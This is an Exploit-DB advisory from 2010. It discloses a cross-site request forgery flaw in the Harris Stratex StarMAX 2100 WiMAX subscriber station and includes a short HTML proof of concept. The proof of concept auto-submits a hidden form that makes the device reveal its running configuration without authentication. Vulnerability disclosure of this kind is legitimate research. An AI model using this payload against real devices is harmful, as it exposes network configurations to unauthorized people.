Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Configuration Cross-Site Request Forgery

EDB-ID:

14264

CVE:

N/A

EDB Verified:

Author:

kalyanakumar

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2010-07-07

Vulnerable App: 
I found CSRF vulnerability in Harris Stratex WIMAX 2100 subscriber
station.Using this code i am able to view the current configuration of the
subscriber station without authentication from both LAN & WAN

# Software Link:http://securityvulns.com/Wdocument736.html
# Version: 3.0.4.1.7.C
# Tested on: Any os
# CVE : No

Product :StarMAX 2100 WIMAX subscriber station
Affected Application Version: 3.0.4.1.7.C
Vendor submission:07-04-2009
Vendor Response:No
Vulnerability:Able to view the running configuration without authentication
from both LAN & WAN

<html>
<body>
<body onload="config.submit();">
<form name=config method="get" action="http:192.168.1.1/frameCmd6.html">
<input type=hidden name=showRunConfig value="Current Configuration">
</form>
</body>
</html>


Thanks
Kalyan
Security researcher
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services